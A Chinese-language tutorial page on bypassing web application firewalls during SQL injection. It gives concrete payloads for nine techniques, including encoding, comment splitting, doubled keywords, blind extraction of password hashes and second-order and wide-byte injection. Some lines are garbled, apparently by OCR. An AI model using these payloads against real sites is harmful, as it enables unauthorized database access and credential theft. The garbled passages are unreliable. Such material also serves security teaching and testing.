IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> SQL注入WAF绕过 -> 正文阅读

[大数据]SQL注入WAF绕过

SQL注入WAF绕过的基本方法

?WAF绕过
WAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,它依罪女全策略对Web应用程序进行保护。安全策略是WAF的灵魂,所谓的“绕过WAF”就是指通过某种方式无视WAF的安全策略,达到攻击的目的。

方法1:变换大小写


实例:比如WAF拦截了union,那就使用Union、UnloN等方式绕过。

方法2:编码


实例1:WAF检测敏感字'~,则可以用Ox7e代替,如extractvalue(1
,concat('~',database()))
可以写成extractvalue(1,concat(Ox7e,database()))。


实例2: WAF检测敏感字'admin',则可以用0x61646d696e代替,如select name,passfrom users where name='admin'可以替换成select name,pass from users where name=0x61646d696e。

实例3:WAF检测敏感字select,可以在URL中将select变成%73elEcT
编码结合大小写变换绕过WAF。


实例4:可以用%09、%0a、%0b、%Oc、%0d、%a0、/**/、/*somewords*/等来替换空格。

方法3:利用注释符


适用于WAF只过滤了一次危险的语句,而没有阻断整个查询语句的场合。
实例:原查询语句为: ?id=1 union select 1,2,3,对于这条查询,WAF过滤了一次union
和select,我们可以仕尿旦阅白.loct 122释里面的过滤掉,如?id=1/*union*/union /*select*/select 1,2,3

方法4:重写


》适用于WAF只过滤一次敏感字的情况。
实例:WAF过滤敏感字union,但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执行我们的查询了:?id=1 ununionion select 1,2,3

方法5:比较操作符替换


适用于某一比较操作符(如等号)被过滤的情况。

实例1:!=不等于,<>不等于,<小于,>大于,这些都可以用来替换=来绕过。
比如要判断某个值是不是74,假设=被过滤,则可以判断是不是大于73,是不是小于75,然后就知道是74了:/?id=1 and ascii(lower(mid((select pwd from users limit 1,1),1,1)))>73

/?id=1 and ascii(lower(mid((select pwd from users limit 1,1),1,1)))<75
实例2:WAF将=、>、<全部过滤,则可以利用like来绕过,如?id=1' or 1 like 1

方法6:同功能函数替换>

适用于某一函数被过滤的情况。
实例:假如substring()被WAF过滤,但substring()可以用同功能的mid(),substr()等函数来替换,都是用来取字符串的某一位字符的。
原查询语句: substring((select 'password'),1,1) = Ox70

替换后的查询语句: substr((select 'password'),1,1)= Ox70
mid((select 'password'),1,1) = Ox70

方法7:盲注的活用


适用于页面无回显或多种函数、逻辑运算符被过滤的情况。

实例: strcmp(expr1,expr2)用来比较两个值,如果expr1=expr2,
则函数返回0,expr1<expr2则返回-1,expr1>expr2则返回1。
假如index.php?uid=123页面返回是正确的,但WAF过滤了and和or ,
原查询语句index.php?uid=123 and left((select hash from users limit 0,1),1)='B',可用
index.php?uid=strcmp(left((select hash from users limit 0,1),1),0x42)+123来替换,通过盲猜hash的第一位,如果第一位等于Ox42也就是B,那么strcmp()将返回0,0+123=123,所以页面应该是正确的。否则就说明不是B,这样猜就不用and和or了.

方法8:二阶注入


所谓二阶注入(又称存储型注入)是指已存储(数据库、文件)的用户输入被读取后再次进入到SQL查询语句中导致的注入。

普通SQL注入:发生在一个HTTP请求和响应中,对系统的攻击是立即执行的:(1)攻击者在http请求中提交非法输入;(2)应用程序处理非法输入,使用非法输入构造SQL语句;(3)在攻击过程中向攻击者返回结果。
二阶SQL注入:(1)攻击者在http请求中提交某种经过构思的输入
(2)应用程序存储该恶意输入(通常保存在数据库中)以便后面使用并响应请求;

(3)攻击者提交第二次(不同的) http请求;

(4)为处理第二次http请求,程序会检索存储在数据库中的恶意输入并进行处理,从而导致攻击者构造的SQL查询被执行;

(5)如果攻击成功,在第二次请求响应中向攻击者返回查询结果。

方法9:宽字节注入


适用于数据库使用双字节编码方式(如GBK)、WAF利用AddSlashes()等函数对敏感字符进行转义的场景。
背景:
统一的国际规范的理想状态:程序都使用Unicode编码,所有的网站都使用UTF-8编码。
现状:国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如GBK。也有一些cms为了考虑老用户,所以出了GBK和UTF-8两个版本。

  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2022-03-15 22:37:16  更:2022-03-15 22:38:46 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2025年1日历 -2025/1/16 17:41:56-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码